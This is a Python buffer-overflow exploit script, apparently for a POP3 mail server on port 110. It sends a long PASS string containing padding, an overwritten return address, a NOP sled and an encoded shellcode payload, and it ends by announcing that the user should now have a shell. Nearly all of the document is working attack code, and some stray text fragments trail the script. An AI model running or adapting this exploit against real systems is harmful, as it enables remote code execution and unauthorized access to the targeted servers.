#By SxNade
#<https://github.com/SxNade>
#<https://sxnade.github.io>

import socket
import sys
import time

print("[+] Initiating Buffer-overflow.....")

buffer = "A" * 2606

eip = "\\x8f\\x35\\x4a\\x5f"

nops = "\\x90" * 16

buf =  b""
buf += b"\\xbb\\x95\\x02\\xec\\xa0\\xd9\\xe1\\xd9\\x74\\x24\\xf4\\x5a\\x31"
buf += b"\\xc9\\xb1\\x52\\x31\\x5a\\x12\\x83\\xea\\xfc\\x03\\xcf\\x0c\\x0e"
buf += b"\\x55\\x13\\xf8\\x4c\\x96\\xeb\\xf9\\x30\\x1e\\x0e\\xc8\\x70\\x44"
buf += b"\\x5b\\x7b\\x41\\x0e\\x09\\x70\\x2a\\x42\\xb9\\x03\\x5e\\x4b\\xce"
buf += b"\\xa4\\xd5\\xad\\xe1\\x35\\x45\\x8d\\x60\\xb6\\x94\\xc2\\x42\\x87"
buf += b"\\x56\\x17\\x83\\xc0\\x8b\\xda\\xd1\\x99\\xc0\\x49\\xc5\\xae\\x9d"
buf += b"\\x51\\x6e\\xfc\\x30\\xd2\\x93\\xb5\\x33\\xf3\\x02\\xcd\\x6d\\xd3"
buf += b"\\xa5\\x02\\x06\\x5a\\xbd\\x47\\x23\\x14\\x36\\xb3\\xdf\\xa7\\x9e"
buf += b"\\x8d\\x20\\x0b\\xdf\\x21\\xd3\\x55\\x18\\x85\\x0c\\x20\\x50\\xf5"
buf += b"\\xb1\\x33\\xa7\\x87\\x6d\\xb1\\x33\\x2f\\xe5\\x61\\x9f\\xd1\\x2a"
buf += b"\\xf7\\x54\\xdd\\x87\\x73\\x32\\xc2\\x16\\x57\\x49\\xfe\\x93\\x56"
buf += b"\\x9d\\x76\\xe7\\x7c\\x39\\xd2\\xb3\\x1d\\x18\\xbe\\x12\\x21\\x7a"
buf += b"\\x61\\xca\\x87\\xf1\\x8c\\x1f\\xba\\x58\\xd9\\xec\\xf7\\x62\\x19"
buf += b"\\x7b\\x8f\\x11\\x2b\\x24\\x3b\\xbd\\x07\\xad\\xe5\\x3a\\x67\\x84"
buf += b"\\x52\\xd4\\x96\\x27\\xa3\\xfd\\x5c\\x73\\xf3\\x95\\x75\\xfc\\x98"
buf += b"\\x65\\x79\\x29\\x0e\\x35\\xd5\\x82\\xef\\xe5\\x95\\x72\\x98\\xef"
buf += b"\\x19\\xac\\xb8\\x10\\xf0\\xc5\\x53\\xeb\\x93\\x29\\x0b\\xd8\\xe6"
buf += b"\\xc2\\x4e\\x1e\\xe8\\xa9\\xc6\\xf8\\x80\\xdd\\x8e\\x53\\x3d\\x47"
buf += b"\\x8b\\x2f\\xdc\\x88\\x01\\x4a\\xde\\x03\\xa6\\xab\\x91\\xe3\\xc3"
buf += b"\\xbf\\x46\\x04\\x9e\\x9d\\xc1\\x1b\\x34\\x89\\x8e\\x8e\\xd3\\x49"
buf += b"\\xd8\\xb2\\x4b\\x1e\\x8d\\x05\\x82\\xca\\x23\\x3f\\x3c\\xe8\\xb9"
buf += b"\\xd9\\x07\\xa8\\x65\\x1a\\x89\\x31\\xeb\\x26\\xad\\x21\\x35\\xa6"
buf += b"\\xe9\\x15\\xe9\\xf1\\xa7\\xc3\\x4f\\xa8\\x09\\xbd\\x19\\x07\\xc0"
buf += b"\\x29\\xdf\\x6b\\xd3\\x2f\\xe0\\xa1\\xa5\\xcf\\x51\\x1c\\xf0\\xf0"
buf += b"\\x5e\\xc8\\xf4\\x89\\x82\\x68\\xfa\\x40\\x07\\x88\\x19\\x40\\x72"
buf += b"\\x21\\x84\\x01\\x3f\\x2c\\x37\\xfc\\x7c\\x49\\xb4\\xf4\\xfc\\xae"
buf += b"\\xa4\\x7d\\xf8\\xeb\\x62\\x6e\\x70\\x63\\x07\\x90\\x27\\x84\\x02"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.43.40', 110))
s.recv(1024)

s.send('USER hacker\\r\\n')
s.recv(1024)

s.send('PASS ' + buffer + eip + nops + buf + '\\r\\n')
s.send('QUIT\\r\\n')
s.close()
print("[+] Exploit Completed")
print("\\n[+] Hopefully You Should Have a Shell Now!\\n")
time.sleep(1)

사용 모듈

/co